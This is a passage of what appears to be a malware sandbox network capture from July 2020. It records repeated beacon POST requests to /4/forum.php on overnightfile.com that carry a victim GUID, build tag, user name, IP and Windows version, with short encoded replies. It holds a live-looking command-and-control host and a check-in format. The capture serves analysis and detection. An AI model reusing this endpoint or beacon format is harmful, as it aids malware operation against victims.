                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJNMQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:43.144378901 CEST856OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:43.232639074 CEST856INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:42 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 43 58 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVCXEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:43.539115906 CEST857OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:43.629667044 CEST 857 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cYNMBARRABw==0
Jul 14, 2020 11:21:43.952353954 CEST 857 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:44.042032957 CEST 858 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cFAZUARRABw==0
Jul 14, 2020 11:21:44.414557934 CEST 858 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:44.503479004 CEST 858 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cJHSQARRABw==0
Jul 14, 2020 11:21:44.808948994 CEST 859 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:44.900147915 CEST 859 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cTAZGARRABw==0
Jul 14, 2020 11:21:45.204744101 CEST 860 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:45.298270941 CEST 860 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cZKPAARRABw==0
Jul 14, 2020 11:21:45.611336946 CEST 860 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:45.706754923 CEST 861 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cGGTTARRABw==0
Jul 14, 2020 11:21:46.025877953 CEST 861 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:46.118980885 CEST 861 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cJYBQARRABw==0
Jul 14, 2020 11:21:46.437747955 CEST 862 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:46.533116102 CEST 862 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cFMNUARRABw==0
Jul 14, 2020 11:21:46.842355967 CEST 863 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:46.936834097 CEST 863 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cMVENARRABw==0
Jul 14, 2020 11:21:47.263849974 CEST 864 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:47.359527111 CEST 864 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cMZANARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:47.680401087 CEST865OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:47.771220922 CEST865INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHFUSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:48.258481026 CEST865OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:48.349756002 CEST865INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGZATARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:48.639834881 CEST866OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:48.733324051 CEST866INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:48 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVFUEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:49.039860964 CEST867OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:49.130265951 CEST867INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:48 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYZABARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:49.479088068 CEST868OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:49.576457977 CEST868INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVZAEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:49.892574072 CEST868OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:49.981486082 CEST869INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQBYJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:50.273179054 CEST869OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:50.366945982 CEST869INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKYBPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:50.808279037 CEST870OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:50.903605938 CEST870INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:50 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZQJAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:51.489044905 CEST870OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:51.583834887 CEST871INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQTGJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:52.254606962 CEST871OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:52.344182014 CEST871INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBJQYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:53.264769077 CEST872OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:53.357738972 CEST872INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 59 42 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTYBGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:53.678448915 CEST873OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
